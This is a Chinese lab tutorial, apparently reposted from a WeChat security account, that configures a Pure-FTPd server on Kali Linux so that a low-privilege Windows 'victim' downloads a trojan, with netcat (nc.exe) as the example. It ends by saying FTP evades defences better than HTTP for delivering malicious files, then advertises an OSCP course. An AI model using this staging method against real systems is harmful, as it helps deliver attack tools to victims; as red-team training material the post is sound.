利用ftp协议传输文件

admin 2025年6月7日10:23:39评论5 views字数 1973阅读6分34秒阅读模式
# Kali Linux 和 Windows10 环境配置**目标**: Kali Linux 充当 FTP 服务器,Windows 低权限用户下载木马文件。## 实现过程Windows 连接 Kali 的 FTP 服务,下载木马文件。### 更新软件库```bashsudo apt update

下载 Pure-FTPd

Pure-FTPd 是一款开源的 FTP(文件传输协议)服务器软件,专注于安全性、轻量化和易用性,适用于多种操作系统(如 Linux、BSD 等)。

sudo apt install pure-ftpd

添加用户组

sudo groupadd ftpgroup

命令解析: 以超级用户(root)权限中创建名为 ftpgroup 的新用户组。

添加系统用户

sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser

命令解析:

  • -g ftpgroup
    : 指定新用户所属的用户组为 ftpgroup
  • -d /dev/null
    : 设置用户的主目录为 /dev/null,这个目录通常用于限制用户登录后的工作目录。
  • -s /etc
    : 设置用户的默认 shell 为 /etc
  • ftpuser
    : 指定要创建的用户名称。

该命令创建了一个名为 ftpuser 的用户,并将其添加到 ftpgroup 组中。

创建 FTP 用户

sudo pure-pw useradd offsec -u ftpuser -d /ftphome

命令解析:

  • pure-pw
    : Pure-FTPd 服务器的用户管理工具。
  • useradd
    : 用于添加新的 FTP 用户。
  • offsec
    : 指定要创建的 FTP 用户名。
  • -u ftpuser
    : 指定该 FTP 用户映射到系统用户 ftpuser
  • -d /ftphome
    : 设置该 FTP 用户的家目录为 /ftphome

这行命令使用 pure-pw 工具创建了一个名为 offsec 的 FTP 用户。

更新数据库

sudo pure-pw mkdb

该命令用于生成 Pure-FTPd 的用户数据库文件。每次添加或修改用户后,都需要运行该命令来更新数据库。

切换目录并建立链接

cd /etc/pure-ftpd/auth/sudoln -s ../conf/PureDB 60pdb

这行命令将当前工作目录切换到 /etc/pure-ftpd/auth/,并在该目录下创建一个名为 60pdb 的符号链接,指向 ../conf/PureDB 文件。

创建目录

sudomkdir -p /ftphome

创建 /ftphome 目录,作为之前创建的 FTP 用户 offsec 的家目录。

添加权限

sudochown -R ftpuser:ftpgroup /ftphome/

命令解析:

  • chown
    : 用于更改文件或目录的所有者和所属组。
  • -R
    : 递归地更改目录及其子目录和文件的所有者和所属组。
  • ftpuser:ftpgroup
    : 指定新的所有者和所属组为 ftpuser 和 ftpgroup

重启服务

sudo systemctl restart pure-ftpd

这行命令重启 Pure-FTPd 服务,使之前的配置更改生效。

验证环境

ftp 127.0.0.1

输入账号密码:offsec/kali,测试连接是否成功。

传输文件

可以开始进行文件传输,Windows 扮演被攻击者,Kali Linux 扮演攻击者。

  1. 「连接 FTP」:在 Windows 上输入以下命令并使用 FTP 用户名和密码登录:

    ftp <ip地址>
  2. 「将文件移入 /ftphome:以传输 nc.exe 为例,将该程序拷贝到 /ftphome 目录:

    sudocp /usr/share/windows-binaries/nc.exe /ftphome
  3. 「获取程序」:在 Windows 上输入以下命令获取程序:

    get nc.exe
  4. 「结束连接并检查文件」:结束 FTP 连接并查看程序是否成功获取:

    quitdir

总结

在现实环境中,FTP 协议用于文件传输的频率相对较低,通常我们会使用 HTTP 协议。但由于 HTTP 协议的防护措施较多,FTP 协议反而更容易被忽视。在针对 FTP 进行文件传输时,上传木马或其他恶意文件有较高的成功率。

对红队工作感兴趣,或者有意报考 OSCP 的师傅,可以考虑一下我们的培训课程,加入微信咨询。好处如下:

利用ftp协议传输文件
  1. 报考后课程随时可看,并且如果对考试没有信心,还可以留群跟第二批课程学习,不限次数时间,报考即是一辈子可看。
  2. 200+ 台靶机及官方课程,lab 靶机 + 域的内容。团队泷老师和小羽老师会带大家全部过一遍,并且群内随时答疑,团队老师及群友都会积极解答,全天可答疑。
  3. 目前可接受分期付款,无利息,最多分四个月,第一次付完即可观看视频。
  4. 加入课程可享受工作推荐机会,优秀者可内推至红队。
  5. 报考即送送官方文档中文版,以及 Kali 命令详解中文版,纯人工翻译,版权为团队所有。

原文始发于微信公众号(泷羽sec-心安):利用ftp协议传输文件

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日10:23:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用ftp协议传输文件https://cn-sec.com/archives/3802235.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息